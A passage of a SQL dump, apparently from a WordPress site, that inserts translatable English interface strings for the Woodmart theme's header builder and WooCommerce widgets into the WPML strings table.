(3711, 'en', 'woodmart', '78df29bedf77cf05ad97de3c61d8bd6f', 'Disable this row for desktop devices completely.', NULL, NULL, '', 'LINE', NULL, 0, '', 'a9af53609a9b21de8f4a9c3bc334c837', 'optional', NULL),
(3712, 'en', 'woodmart', '8579b8af07da04fc0ccd62625349320f', 'Hide on mobile', NULL, NULL, '', 'LINE', NULL, 0, '', 'abe3a752bef03c442c332008df92e539', 'optional', NULL),
(3713, 'en', 'woodmart', '214bf68a4881ffb41f506a8ad9d77f9e', 'Disable this row for mobile devices completely.', NULL, NULL, '', 'LINE', NULL, 0, '', '31eeaf3a91156c8e21160f9f35d097cd', 'optional', NULL),
(3714, 'en', 'woodmart', '19cf022f3fcc6ead27036088e62dd888', 'Make it sticky', NULL, NULL, '', 'LINE', NULL, 0, '', '9530b96b03c768f32c9c351375c0d86d', 'optional', NULL),
(3715, 'en', 'woodmart', '061141ac12519e0d368c47ba404b5b61', 'Make this row sticky on scroll.', NULL, NULL, '', 'LINE', NULL, 0, '', '0a48f6dc5e847a4ef4041cdbd40834bf', 'optional', NULL),
(3716, 'en', 'woodmart', '59d62508d8be85bcf0f02077ee9e281f', 'Row height on sticky header', NULL, NULL, '', 'LINE', NULL, 0, '', '79acfe11bcacac41767f3a41788afc62', 'optional', NULL),
(3717, 'en', 'woodmart', '35b6ffe4a82751f5781febc5704846b7', 'Determine the header height for sticky header value in pixels.', NULL, NULL, '', 'LINE', NULL, 0, '', '45ddb80f6d5757a99a306d5efc3aa625', 'optional', NULL),
(3718, 'en', 'woodmart', '5d50889672f6f860d14f502de3de1957', 'Colors', NULL, NULL, '', 'LINE', NULL, 0, '', '286969c31b6b99af1f34da8f2abd2d30', 'optional', NULL),
(3719, 'en', 'woodmart', '7c9c64ad44bd4a44bd61df6de711f5ae', 'Select different text color scheme depending on your background.', NULL, NULL, '', 'LINE', NULL, 0, '', '6fb5abb85cc12808a7ee886bd87b2ce2', 'optional', NULL),
(3720, 'en', 'woodmart', 'c052d79d33a1cf18d1a678055ab4ea6a', 'Add shadow to the header section.', NULL, NULL, '', 'LINE', NULL, 0, '', 'be964db627fe624ccdae9b1206308672', 'optional', NULL),
(3721, 'en', 'woodmart', 'ddb797433c8811afc419414729bdbf73', 'Background settings', NULL, NULL, '', 'LINE', NULL, 0, '', '610b83aa22e62c4932825a565e986ef6', 'optional', NULL),
(3722, 'en', 'woodmart', '295fd14abd783fac599d54a1b54521b3', 'Border bottom', NULL, NULL, '', 'LINE', NULL, 0, '', '0c947eaea61a7449e6a7750edf23c442', 'optional', NULL),
(3723, 'en', 'woodmart', '2b579049f31ea2dcf8371ab6ed5d0721', 'Set border bottom for this header row.', NULL, NULL, '', 'LINE', NULL, 0, '', 'f36a0986f33b9d25e7eb19ea9d819347', 'optional', NULL),
(3724, 'en', 'woodmart', 'c7f2324137685caeec6ddda7ba98d8f6', 'Secondary menu', NULL, NULL, '', 'LINE', NULL, 0, '', 'a8e79626f630562d6a1e7e2acc7f8b21', 'optional', NULL),
(3725, 'en', 'woodmart', '6f016cc7cb2cc03a20d0174ccd36fbc5', 'Choose menu', NULL, NULL, '', 'LINE', NULL, 0, '', '88120714d39d86e6bc0734e11131d21d', 'optional', NULL),
(3726, 'en', 'woodmart', 'db8d0dcc0572be4b962780721b47500c', 'Choose which menu to dislay in the header.', NULL, NULL, '', 'LINE', NULL, 0, '', 'da4e0f9a486b1e4f7e2a7872e63e01b1', 'optional', NULL),
(3727, 'en', 'woodmart', '2518f31c5787e26a6e516fc79216c92c', 'You can change menu style in the header.', NULL, NULL, '', 'LINE', NULL, 0, '', 'c5365f7a081446f87721b796d191ffe6', 'optional', NULL),
(3728, 'en', 'woodmart', 'b12a96ab5022ed62a80350f50590ee1a', 'Menu align', NULL, NULL, '', 'LINE', NULL, 0, '', '28dd94bc870af1810a6f2eecac08cbde', 'optional', NULL),
(3729, 'en', 'woodmart', '22daa8f26a7383e5d5e233fe6ef5bb09', 'Set the menu items text align.', NULL, NULL, '', 'LINE', NULL, 0, '', '6c7fbf7a700cb83f81ceb05583df60dc', 'optional', NULL),
(3730, 'en', 'woodmart', '14f15c4adca641f649fead532c1bb4f7', 'Set the items gap.', NULL, NULL, '', 'LINE', NULL, 0, '', '22c9638d677065b3e2f4ac4588901ea7', 'optional', NULL),
(3731, 'en', 'woodmart', 'c59a140f24db0bf24f707a3235517c44', 'The width of the element will depend on its content', NULL, NULL, '', 'LINE', NULL, 0, '', '16ec32eb2afb0427300acd7544a58979', 'optional', NULL),
(3732, 'en', 'woodmart', '7725a107e2dcbd000dc4d6580fa75b6f', 'Website\'s logo', NULL, NULL, '', 'LINE', NULL, 0, '', 'aaba3df419f4da772cdba9cff4d6cef8', 'optional', NULL),
(3733, 'en', 'woodmart', '7c01364538378ba9964943f9b6ca7539', 'Logo image', NULL, NULL, '', 'LINE', NULL, 0, '', 'f0486f97635a90f2d2e56fa71c46d46f', 'optional', NULL),
(3734, 'en', 'woodmart', 'f5cd05a6241804211cf50d27fae55522', 'Logo width', NULL, NULL, '', 'LINE', NULL, 0, '', '2f2a837e0c09ad4c9e399648f4d96dc9', 'optional', NULL),
(3735, 'en', 'woodmart', 'f38c1ae76eee83307425e5ca0ad26813', 'Determine the logo image width in pixels.', NULL, NULL, '', 'LINE', NULL, 0, '', '58d8c2b18eff13e9b711a09694b829fa', 'optional', NULL),
(3736, 'en', 'woodmart', '24efa7ee4511563b16144f39706d594f', 'Notice', NULL, NULL, '', 'LINE', NULL, 0, '', 'b56935f8eaa36f2570ed5af22ffc6440', 'optional', NULL),
(3737, 'en', 'woodmart', '58efa7f28280cc957c42324840796957', 'Optional. You do not have to upload your logo if it is the same as on a regular header. Use this option only if the logo for the sticky header is different or has a different size.', NULL, NULL, '', 'LINE', NULL, 0, '', '61e101572ed9966e8046f653da83b439', 'optional', NULL),
(3738, 'en', 'woodmart', 'd3bd0acc8d35cb9c8571a0c15bc2651b', 'Sticky header', NULL, NULL, '', 'LINE', NULL, 0, '', '48a1a3d553af415e8a800862ef811db4', 'optional', NULL),
(3739, 'en', 'woodmart', 'fff3eefc0e5069004b4b97f7e81259b9', 'Logo image for sticky header', NULL, NULL, '', 'LINE', NULL, 0, '', '88f3f6158f436afef87ab10f477cbf83', 'optional', NULL),
(3740, 'en', 'woodmart', '99d210e8641524dac9a2d494ea93df99', 'Sticky header logo width', NULL, NULL, '', 'LINE', NULL, 0, '', '8df10575ebf6c41a295aac4b0c713195', 'optional', NULL),
(3741, 'en', 'woodmart', '6da03fd51364bbaab6dd4e91e21530d9', 'Determine the logo on the sticky header image width in pixels.', NULL, NULL, '', 'LINE', NULL, 0, '', 'b6518a47666c982721771dd1bd230abc', 'optional', NULL),
(3742, 'en', 'woodmart', '643165e75ee55c75478b703b7c6749e4', 'Add width and height attributes', NULL, NULL, '', 'LINE', NULL, 0, '', '1975894b3e79152bff8cc94d3b0e0c32', 'optional', NULL),
(3743, 'en', 'woodmart', 'fa03eb688ad8aa1db593d33dabd89bad', 'Root', NULL, NULL, '', 'LINE', NULL, 0, '', '04657db297b645bf8168b5b263ce5182', 'optional', NULL),
(3744, 'en', 'woodmart', '4d7a3b1c46041dc73dec5764f3a6b63a', 'Main menu', NULL, NULL, '', 'LINE', NULL, 0, '', '7b22962ea2706adf3b43c8c39d99b275', 'optional', NULL),
(3745, 'en', 'woodmart', '807ef262ee6473b75b97d3e58d2ac848', 'Main navigation', NULL, NULL, '', 'LINE', NULL, 0, '', '7de47a7d31275042f338b54216897249', 'optional', NULL),
(3746, 'en', 'woodmart', '687c8dce3c434ad4c183fa05bb0238a1', 'Enable to show your menu in full screen style on burger icon click.', NULL, NULL, '', 'LINE', NULL, 0, '', 'ae026d1800a917efe0df87899f938eb8', 'optional', NULL),
(3747, 'en', 'woodmart', 'a8d32346ff777b4e02810282791ddcec', 'Display a certain number of categories and \"show more\" button', NULL, NULL, '', 'LINE', NULL, 0, '', 'bf7916a40e3a2fb44bfaf60cbc254b57', 'optional', NULL),
(3748, 'en', 'woodmart', 'c03ff69133c68db49573c19abc42f36b', 'Submenu dropdown stays open after cursor leaves the parent menu item. Stops working if \"Open categories menu\" options is enabled on a page.', NULL, NULL, '', 'LINE', NULL, 0, '', '4e2e62b75b2fcd1accd2ca82e921251f', 'optional', NULL),
(3749, 'en', 'woodmart', 'befa9a640d6cde27a2b15fdd92d5fd27', 'Menu title', NULL, NULL, '', 'LINE', NULL, 0, '', '2c0fe9dc7536f3f4dbdab50ba283c11f', 'optional', NULL),
(3750, 'en', 'woodmart', '4447cf1fac1a624a21c9f692abb70a25', 'Specify your custom title for this menu dropdown or leave it empty to keep \"Browse categories\".', NULL, NULL, '', 'LINE', NULL, 0, '', '9b108d78bdf22d61491212fd83f236a0', 'optional', NULL),
(3751, 'en', 'woodmart', '0dba9f35f369452e073263ede187dc2a', 'Choose which menu to display in the header as a categories dropdown.', NULL, NULL, '', 'LINE', NULL, 0, '', '16a799c990b3874cca312b92b1c948ce', 'optional', NULL),
(3752, 'en', 'woodmart', 'a1e2b2504f1c6034cbbc0d361dee08bd', 'Limit categories', NULL, NULL, '', 'LINE', NULL, 0, '', '87cf940d28a38cb234a085a8c79fc67c', 'optional', NULL),
(3753, 'en', 'woodmart', '1c60d824edb285957460f14afa9844d7', 'Number of categories', NULL, NULL, '', 'LINE', NULL, 0, '', '123ce713697b94a124296766304d147a', 'optional', NULL),
(3754, 'en', 'woodmart', '6426b306ca54b1ab3d9d94d0d28959c0', 'Specify the number of categories to be shown initially', NULL, NULL, '', 'LINE', NULL, 0, '', '3beed8828afc9bc100987eb3156c9dd7', 'optional', NULL),
(3755, 'en', 'woodmart', '4172286061d0329fbebd0846f8faaeb0', 'Open menu item dropdown', NULL, NULL, '', 'LINE', NULL, 0, '', '9987a459f73758e53902ae139d2330bf', 'optional', NULL),
(3756, 'en', 'woodmart', '4ec332259d9056a0bd2b8016466b0553', 'Select different text color scheme depending on your header background.', NULL, NULL, '', 'LINE', NULL, 0, '', 'd216850399003e36394e9a972b8344b5', 'optional', NULL),
(3757, 'en', 'woodmart', '070554647306343cbea29ebfdd278ba8', 'Border', NULL, NULL, '', 'LINE', NULL, 0, '', 'd81774df5c407d3b4f2cae8337fc5453', 'optional', NULL),
(3758, 'en', 'woodmart', '6b073ae79013280d25f339e962bd98eb', 'Border settings for this element.', NULL, NULL, '', 'LINE', NULL, 0, '', '944fda80ab3d3b4c0cbb8967de678c71', 'optional', NULL),
(3759, 'en', 'woodmart', '1976d7f704de389d9fe064e08ea35b2d', 'Column', NULL, NULL, '', 'LINE', NULL, 0, '', '635a4f877bbac713c7f5a3e3e02f15e8', 'optional', NULL),
(3760, 'en', 'woodmart', 'd9751e5357213544ccc772f69a2d480e', 'Text/HTML', NULL, NULL, '', 'LINE', NULL, 0, '', 'f19f52da582445da8108533b5e1a4cd5', 'optional', NULL),
(3761, 'en', 'woodmart', 'ffd1f7ea2dce0c8a86eba2b594698bb4', 'Plain text/HTML', NULL, NULL, '', 'LINE', NULL, 0, '', '590d0def54afffb08a14ea2534b1df03', 'optional', NULL),
(3762, 'en', 'woodmart', '6c5ef32b40d0dcd40cb543143648a8fd', 'Text/HTML content', NULL, NULL, '', 'LINE', NULL, 0, '', '1f2d34d85744bdfa4f67aa192f1026e0', 'optional', NULL),
(3763, 'en', 'woodmart', '7bc36b19d03fa7a3f0a08901fb8a9241', 'Place your text or HTML code with WordPress shortcodes.', NULL, NULL, '', 'LINE', NULL, 0, '', '4b1a1d3e5d35ea126af604b308eb0d05', 'optional', NULL),
(3764, 'en', 'woodmart', '59df128218abef63906f29bd2f34db7e', 'Compare icon', NULL, NULL, '', 'LINE', NULL, 0, '', '3c4b297f9db566cb930f28f40221e094', 'optional', NULL),
(3765, 'en', 'woodmart', '5c1db357e3b4760dee7307d5879f817c', 'You can show the icon only or display \"Compare\" text too.', NULL, NULL, '', 'LINE', NULL, 0, '', '16e2bcbb86f4e054761a398a67618ee5', 'optional', NULL),
(3766, 'en', 'woodmart', '60fa1c5920b72ed50312036a2028a587', 'Button with link', NULL, NULL, '', 'LINE', NULL, 0, '', 'b44e6e8230745e74931ccb577077e021', 'optional', NULL),
(3767, 'en', 'woodmart', '303d930f85f11201ff95af95d1017796', 'Enter the class name of the icon. For example \"fas fa-check\".', NULL, NULL, '', 'LINE', NULL, 0, '', '798f57e08e52313e68c9450c1bdfaab9', 'optional', NULL),
(3768, 'en', 'woodmart', 'c50896e1bd7976ec1baf180b51cdff14', 'Enter the class name of the icon. For example \"oi oi-check\".', NULL, NULL, '', 'LINE', NULL, 0, '', '016111c623a8a79471720b8678159972', 'optional', NULL),
(3769, 'en', 'woodmart', '4c96060953cebf995dda5c6159158ee7', 'Enter the class name of the icon. For example \"typcn typcn-input-checked\".', NULL, NULL, '', 'LINE', NULL, 0, '', '58963d94b066c80599b002904a51e416', 'optional', NULL),
(3770, 'en', 'woodmart', '89180a2ab32f7d00a0cfae7ac9e7359d', 'Enter the class name of the icon. For example \"entypo-icon entypo-icon-check\".', NULL, NULL, '', 'LINE', NULL, 0, '', 'd535ff3ac4d2965928d2891db372494a', 'optional', NULL),
(3771, 'en', 'woodmart', '748637560493bbbc200f7e723ed8ca57', 'Enter the class name of the icon. For example \"vc_li vc_li-star\".', NULL, NULL, '', 'LINE', NULL, 0, '', '5b1ca12d2c80439abb97fabf1007b8ac', 'optional', NULL),
(3772, 'en', 'woodmart', '50e66b3c85bf3499be2c7e1259d72f81', 'Enter the class name of the icon. For example \"vc-mono vc-mono-addme\".', NULL, NULL, '', 'LINE', NULL, 0, '', '2b4b28ef6c8442dc567486fc848d5231', 'optional', NULL),
(3773, 'en', 'woodmart', '0845e5d33356082a9e993baa70236eb4', 'Enter the class name of the icon. For example \"vc-material vc-material-check\".', NULL, NULL, '', 'LINE', NULL, 0, '', 'd983433ff083ce174ec4723c1dc3d9bf', 'optional', NULL),
(3774, 'en', 'woodmart', 'b6a27408614bfd512bc7f89d19787011', 'Social links icons', NULL, NULL, '', 'LINE', NULL, 0, '', '491a4802ed2cc71a826cd2cffb982814', 'optional', NULL),
(3775, 'en', 'woodmart', '9c852a140647db959ac7fbf251ecbbe2', 'Mobile burger icon', NULL, NULL, '', 'LINE', NULL, 0, '', 'dfec4e6f98e75a8335eb43d1ebc0b9e9', 'optional', NULL),
(3776, 'en', 'woodmart', '9e5baca59aeb73ee2c2f687bf7340fc8', 'You can change the burger icon style.', NULL, NULL, '', 'LINE', NULL, 0, '', 'd827f6ade349f270c5bdcbb270988edf', 'optional', NULL),
(3777, 'en', 'woodmart', '331fe996f26fe640f918eb4adcf96efc', 'Position of the mobile menu sidebar.', NULL, NULL, '', 'LINE', NULL, 0, '', '8945086ad01b35d6da7cceeb54cf44ea', 'optional', NULL),
(3778, 'en', 'woodmart', '5b0fcfd4e8df941e7e1f96174bddb281', 'Show search form', NULL, NULL, '', 'LINE', NULL, 0, '', '2cd958050f9ee1728e0c4d3d6630a2b6', 'optional', NULL),
(3779, 'en', 'woodmart', '5dd4dcd5230b602592f235b0e6b33a21', 'Show/Hide', NULL, NULL, '', 'LINE', NULL, 0, '', '19915530f9d3fefe93c3e7052f2d20c0', 'optional', NULL),
(3780, 'en', 'woodmart', '20083f84bb1c06e848395c682d58aa03', 'Show categories menu', NULL, NULL, '', 'LINE', NULL, 0, '', '657c7cd5b561c2aa347a456ce626260a', 'optional', NULL),
(3781, 'en', 'woodmart', '9ee41b72ede374ae6b9e71006219da5d', 'Swap menus', NULL, NULL, '', 'LINE', NULL, 0, '', '90828a3a9a289717f10da078f566e7e1', 'optional', NULL),
(3782, 'en', 'woodmart', '0be8d7391e542f114e80cf50c4651f4e', 'First menu tab title', NULL, NULL, '', 'LINE', NULL, 0, '', 'f664567784f402fb415d0eb0d26934b0', 'optional', NULL),
(3783, 'en', 'woodmart', '96f6f2c86cac2d68c73266bd825816c4', 'You can rewrite mobile menu tab title with this option. Or leave empty to have a default one - Menu.', NULL, NULL, '', 'LINE', NULL, 0, '', 'cf40ccdec1abd603c133ea3cd5226348', 'optional', NULL),
(3784, 'en', 'woodmart', 'f7f01b349956b11e63b349b652a3807f', 'Second menu tab title', NULL, NULL, '', 'LINE', NULL, 0, '', '0a71558e7231ff41152e2225189b5c3c', 'optional', NULL),
(3785, 'en', 'woodmart', '7a53b86a04638fe2bc9a88f97cd1a44a', 'You can rewrite mobile menu tab title with this option. Or leave empty to have a default one - Categories.', NULL, NULL, '', 'LINE', NULL, 0, '', '6fb754e2813f1ad6bc15c287393f1f91', 'optional', NULL),
(3786, 'en', 'woodmart', 'e326d7aabc99204113133c49955bfb68', 'Choose which menu to display.', NULL, NULL, '', 'LINE', NULL, 0, '', '5ea49e7af86670378a20f2652df51487', 'optional', NULL),
(3787, 'en', 'woodmart', 'db8987a5b6ec30ab2ab0c6abaf3987ad', 'Show wishlist', NULL, NULL, '', 'LINE', NULL, 0, '', '2373542166b66071cf186c86a372eda3', 'optional', NULL),
(3788, 'en', 'woodmart', 'cc3f9ede1ab20bc13c1d672c4a10ccf5', 'Show compare', NULL, NULL, '', 'LINE', NULL, 0, '', '9af952ca7c205b773982ac6bdb3c4cf7', 'optional', NULL),
(3789, 'en', 'woodmart', '03510c169616f50fdb80578c5dba7180', 'Show account', NULL, NULL, '', 'LINE', NULL, 0, '', '12e7e02cdc272bb42e550075c66ad95d', 'optional', NULL),
(3790, 'en', 'woodmart', '77631a96a9b51cfe662942b7a8bd41e1', 'Show close button', NULL, NULL, '', 'LINE', NULL, 0, '', '053ed54f7a7c4e85d42fb514239ba20b', 'optional', NULL),
(3791, 'en', 'woodmart', '900d0d1d103850a1bd4e3a0afbd0be6c', 'XTemos Headers Manager', NULL, NULL, '', 'LINE', NULL, 0, '', 'fcf25bc34895262187293385a797544b', 'optional', NULL),
(3792, 'en', 'woodmart', '97536c48ad9a6c02b224c58a6da55aed', 'Here you can manage your header layouts, create new ones, import and export. You can set which header to use for all pages by default.', NULL, NULL, '', 'LINE', NULL, 0, '', '3a1c0301bba24987ce4e1d5cfdd2b22c', 'optional', NULL),
(3793, 'en', 'woodmart', '9e359467bca49c726fd1b3e58e8ef136', 'Create a new header', NULL, NULL, '', 'LINE', NULL, 0, '', 'e6ef7f1b421c38180227c463e98f08c4', 'optional', NULL),
(3794, 'en', 'woodmart', '58149df78cc844d4cdf8be94b82b39a1', 'Remove header', NULL, NULL, '', 'LINE', NULL, 0, '', 'f6b4bcdae8165484405bcfd7c590b7d5', 'optional', NULL),
(3795, 'en', 'woodmart', 'ccd2790942d04215bf1a1c3f80416927', 'Make default header', NULL, NULL, '', 'LINE', NULL, 0, '', '37932cf8c6848a82f23b768130126cb5', 'optional', NULL),
(3796, 'en', 'woodmart', '0622a0ba2de5cdf5e5930ad2df6dcbff', 'Header settings', NULL, NULL, '', 'LINE', NULL, 0, '', '368e27ab4d3a5319d9e62e31b07c7e08', 'optional', NULL),
(3797, 'en', 'woodmart', '05f82d33fdeb0c5730cbccd9cd5a8747', 'Make it default', NULL, NULL, '', 'LINE', NULL, 0, '', 'd47a8205147a7af2bb07df47b744a486', 'optional', NULL),
(3798, 'en', 'woodmart', 'ca1f899df388a1afa26a3d60c6ea1b49', 'Import new header', NULL, NULL, '', 'LINE', NULL, 0, '', '2991e647b35191a0a9b3791910b3750b', 'optional', NULL),
(3799, 'en', 'woodmart', '370dcc22b2122aaabcdb0689560672b5', 'JSON code for import is not valid!', NULL, NULL, '', 'LINE', NULL, 0, '', 'efebab854e8acaad630c279e1d850cb4', 'optional', NULL),
(3800, 'en', 'woodmart', '4c5f4f5fc8c545cff2651ca58a10f2c7', 'Paste your JSON header export data here and click \"Import\"', NULL, NULL, '', 'LINE', NULL, 0, '', '2beac748068223e731a5724734b1a8c5', 'optional', NULL),
(3801, 'en', 'woodmart', '79b827bcb40daaf62feed813222f61a5', 'Are you sure you want to remove this header?', NULL, NULL, '', 'LINE', NULL, 0, '', '53f5872f4fc2ac77242b846c343fb173', 'optional', NULL),
(3802, 'en', 'woodmart', 'd14acec3a35f00937d3fc0bbcda5c835', 'Press OK to make this header default for all pages, Cancel to leave.', NULL, NULL, '', 'LINE', NULL, 0, '', '0b52952a25e563b4fc7414c30f06d068', 'optional', NULL),
(3803, 'en', 'woodmart', '34c061a097740b3d682edfb9757b27b1', 'Choose which layout you want to use as a base for your new header.', NULL, NULL, '', 'LINE', NULL, 0, '', 'e4b3a9ab176a5232e7ba004cd067a15e', 'optional', NULL),
(3804, 'en', 'woodmart', '87763ce01fe1af1847e68f04375b433c', 'Examples library', NULL, NULL, '', 'LINE', NULL, 0, '', '720368eaf909eafaea37a7d8c0a7316c', 'optional', NULL),
(3805, 'en', 'woodmart', '0daed819cc68606d9d4aa257e3214a2f', 'User headers', NULL, NULL, '', 'LINE', NULL, 0, '', '78223c37d26432029329aa6b484fadb2', 'optional', NULL),
(3806, 'en', 'woodmart', '2b788336f15ac00bcb9125ec2355073c', 'Background image repeat', NULL, NULL, '', 'LINE', NULL, 0, '', '1a0ab9e5ba58e29af6f43ff203125fa4', 'optional', NULL),
(3807, 'en', 'woodmart', '30c77075f5a85d60327765844819a818', 'No repeat', NULL, NULL, '', 'LINE', NULL, 0, '', 'bf5067f661e8e04122e721534c7b78cd', 'optional', NULL),
(3808, 'en', 'woodmart', 'e76f9923c2ad306e17b2c169112e4840', 'Repeat All', NULL, NULL, '', 'LINE', NULL, 0, '', '354ac7a96210cac3bb5995e5ddc617fe', 'optional', NULL),
(3809, 'en', 'woodmart', 'bc82add034ecbe8a153c42a09e27555f', 'Repeat horizontally', NULL, NULL, '', 'LINE', NULL, 0, '', '33059af263dcdb53f63f9e8956117977', 'optional', NULL),
(3810, 'en', 'woodmart', 'b3f2ef92993922a6da56d890db7b4bb5', 'Repeat vertically', NULL, NULL, '', 'LINE', NULL, 0, '', '79ab2aa480d36c67f5108b7ea996de35', 'optional', NULL),
(3811, 'en', 'woodmart', 'a34ed6042031cf8e53482c81146fc315', 'Background image size', NULL, NULL, '', 'LINE', NULL, 0, '', 'b126f2e29da275eadf7e789cd6dd25b9', 'optional', NULL),
(3812, 'en', 'woodmart', '0aa6c5c9364633acc216732aa19053d4', 'Background image attachment', NULL, NULL, '', 'LINE', NULL, 0, '', '243135d5af8b9f254cf56006a29e2d26', 'optional', NULL),
(3813, 'en', 'woodmart', '4457d440870ad6d42bab9082d9bf9b61', 'Fixed', NULL, NULL, '', 'LINE', NULL, 0, '', 'e0845d03c16234a601dfe13548f3b262', 'optional', NULL),
(3814, 'en', 'woodmart', '105078d294d30c978ca2badf7f376934', 'Scroll', NULL, NULL, '', 'LINE', NULL, 0, '', '1ebc6a61728fdbf7382ad9922b25e692', 'optional', NULL),
(3815, 'en', 'woodmart', '7317d43a7b6e6009a52d51250e775755', 'Background image position', NULL, NULL, '', 'LINE', NULL, 0, '', '8194a8116996c1ea0ef32f681b6a4b7b', 'optional', NULL),
(3816, 'en', 'woodmart', '0e7278cda02a9c0446dcc75a4df34eb2', 'Container', NULL, NULL, '', 'LINE', NULL, 0, '', '8107f3c7b2542c7350f99a6096cc8b39', 'optional', NULL),
(3817, 'en', 'woodmart', 'b8f38b4e11bfea1098ec6f86c33a3e44', 'fullwidth', NULL, NULL, '', 'LINE', NULL, 0, '', '0b50c3fce97bdbf64c545651bc56f9e8', 'optional', NULL),
(3818, 'en', 'woodmart', '2f3e3aba4608b6c748b182f722c8f6f0', 'boxed', NULL, NULL, '', 'LINE', NULL, 0, '', '72f43e0a5389090046f33fe161ce1ada', 'optional', NULL),
(3819, 'en', 'woodmart', '2959ce8aed67d6b6e6f5cefd601f1091', 'Open in new window', NULL, NULL, '', 'LINE', NULL, 0, '', 'eee68808631cc7741a6e079dc79ffccd', 'optional', NULL),
(3820, 'en', 'woodmart', 'ea79e321b6e1478f2631aa9ebe82b0c6', 'Add element to this section', NULL, NULL, '', 'LINE', NULL, 0, '', 'e7699bb871ac92b6114ac1ab8809e7ee', 'optional', NULL),
(3821, 'en', 'woodmart', '7fe21f3fc9c8ccd6a50eede1b7536ef2', 'Are you sure you want to delete this element?', NULL, NULL, '', 'LINE', NULL, 0, '', '49f5d58fed839ada49d235b05b65be04', 'optional', NULL),
(3822, 'en', 'woodmart', '9a605edc6645ad21179f390695db6e4c', 'Export this header structure', NULL, NULL, '', 'LINE', NULL, 0, '', '1be4cf451a2ae71567713965d97f5149', 'optional', NULL),
(3823, 'en', 'woodmart', 'd5a41b5090bf839a9f72998e828ca92d', 'Copy the code from the following text area and save it. You will be\n						able to import it later with our import function in the headers\n						manager.', NULL, NULL, '', 'LINE', NULL, 0, '', '4ec3d903551b7403869f4c83ad25b425', 'optional', NULL),
(3824, 'en', 'woodmart', 'bd1030a6503301258120894236b1cbdc', 'Save header', NULL, NULL, '', 'LINE', NULL, 0, '', '35c3d7652fb4f328e9d7bce257f377f4', 'optional', NULL),
(3825, 'en', 'woodmart', 'df729dc6409ee99e34fbbbdc34eadb78', 'Back to headers list', NULL, NULL, '', 'LINE', NULL, 0, '', '64669bc29128e009503a9390c13c56d1', 'optional', NULL),
(3826, 'en', 'woodmart', 'ff24590464659ee8cdec688128c35f89', 'Clone', NULL, NULL, '', 'LINE', NULL, 0, '', '2be81b0795296c7505d5d5958cd443fb', 'optional', NULL),
(3827, 'en', 'woodmart', '0ce9f14cf8667a1e2aacb3ddc96d4dca', 'Add element', NULL, NULL, '', 'LINE', NULL, 0, '', 'e654202c842f07af1204d865363d34c9', 'optional', NULL),
(3828, 'en', 'woodmart', '5e6d1b81196dab9470f551056ed3eb09', 'Loading, please wait...', NULL, NULL, '', 'LINE', NULL, 0, '', 'ded093f29ff211104ff490ffaaa59fe6', 'optional', NULL),
(3829, 'en', 'woodmart', 'c9cc8cce247e49bae79f15173ce97354', 'Save', NULL, NULL, '', 'LINE', NULL, 0, '', 'f24f12d39af15298420a807a6615ff92', 'optional', NULL),
(3830, 'en', 'woodmart', '21db78943ec4a34817331d11ec6ff3e4', 'Export header', NULL, NULL, '', 'LINE', NULL, 0, '', 'f546496b77dcdc500d5b8af401a056f7', 'optional', NULL),
(3831, 'en', 'woodmart', '05ec0339b0ed6d51a156a14c1d9f150b', 'Desktop layout', NULL, NULL, '', 'LINE', NULL, 0, '', '26afad350872e0be1472bdcb3a1340fe', 'optional', NULL),
(3832, 'en', 'woodmart', 'd8d50ba09ba707cda97b00a74e634447', 'Mobile layout', NULL, NULL, '', 'LINE', NULL, 0, '', '57b5cbf39c94c127125dbdb9cfa83bdc', 'optional', NULL),
(3833, 'en', 'woodmart', 'fb68cf63a37016c4606ad85f9ab73909', 'Header is successfully saved.', NULL, NULL, '', 'LINE', NULL, 0, '', 'ea2269c47e11c4cd9d9ade988e52f247', 'optional', NULL),
(3834, 'en', 'woodmart', '0f36142e0662a008ef55f8c400570754', 'Default header for all pages is changed.', NULL, NULL, '', 'LINE', NULL, 0, '', '639b1fdb4707a144423a07ac88b07dd5', 'optional', NULL),
(3835, 'en', 'woodmart', 'f1206f9fadc5ce41694f69129aecac26', 'Configure', NULL, NULL, '', 'LINE', NULL, 0, '', 'f96e88ff15ae3e2a92e61fb4c0bbbf60', 'optional', NULL),
(3836, 'en', 'woodmart', '2e5d8aa3dfa8ef34ca5131d20f9dad51', 'settings', NULL, NULL, '', 'LINE', NULL, 0, '', '9b25443ff48aec33c7a6d3226d2aa452', 'optional', NULL),
(3837, 'en', 'woodmart', '6799a5495d5bffa918f8107dd05f572b', 'WOODMART WooCommerce Sort by', NULL, NULL, '', 'LINE', NULL, 0, '', 'd05301bbb0c0e06f551cb3fd88e07de9', 'optional', NULL),
(3838, 'en', 'woodmart', '562eee7ff5d8a16056acf8e8225425bb', 'Sort products by name, price, popularity etc.', NULL, NULL, '', 'LINE', NULL, 0, '', 'f6cda8abda6ce4626b768ff2f1983f1c', 'optional', NULL),
(3839, 'en', 'woodmart', 'e22269bb51f9f2394e148716babbafbb', 'Popularity', NULL, NULL, '', 'LINE', NULL, 0, '', '81b71cfe88908056fe56c44fd1aa72a7', 'optional', NULL),
(3840, 'en', 'woodmart', '8150f535510d12d6089f50dde1cc3f4a', 'Average rating', NULL, NULL, '', 'LINE', NULL, 0, '', '531bb0887d41a7486289de7d49aabbf9', 'optional', NULL),
(3841, 'en', 'woodmart', '978b5ef99426ef965b54c7616e7edc12', 'Newness', NULL, NULL, '', 'LINE', NULL, 0, '', '51dc414d419c1bcdfd11bd3910aa6238', 'optional', NULL),
(3842, 'en', 'woodmart', '9852361b414bae93a0001db9def6d73b', 'Price: low to high', NULL, NULL, '', 'LINE', NULL, 0, '', '8b2862f527bd9990da4fb6b3c830b08b', 'optional', NULL),
(3843, 'en', 'woodmart', 'fda1bbb2d724e162b8f35d7dc78bd558', 'Price: high to low', NULL, NULL, '', 'LINE', NULL, 0, '', '459e10cde05003759171f9ecc3c003c9', 'optional', NULL),
(3844, 'en', 'woodmart', 'c672bef8063063dd968819c8f2b7eb51', 'WOODMART Author Information', NULL, NULL, '', 'LINE', NULL, 0, '', '27ea27a3e94d84bd51148dbe1b503c39', 'optional', NULL),
(3845, 'en', 'woodmart', '07056f2c976e9baac3384b263a5fb615', 'Small information block about blog author', NULL, NULL, '', 'LINE', NULL, 0, '', 'db4b2c64297dea67be35978caaf68170', 'optional', NULL);
INSERT INTO `wp_icl_strings` (`id`, `language`, `context`, `name`, `value`, `string_package_id`, `location`, `wrap_tag`, `type`, `title`, `status`, `gettext_context`, `domain_name_context_md5`, `translation_priority`, `word_count`) VALUES
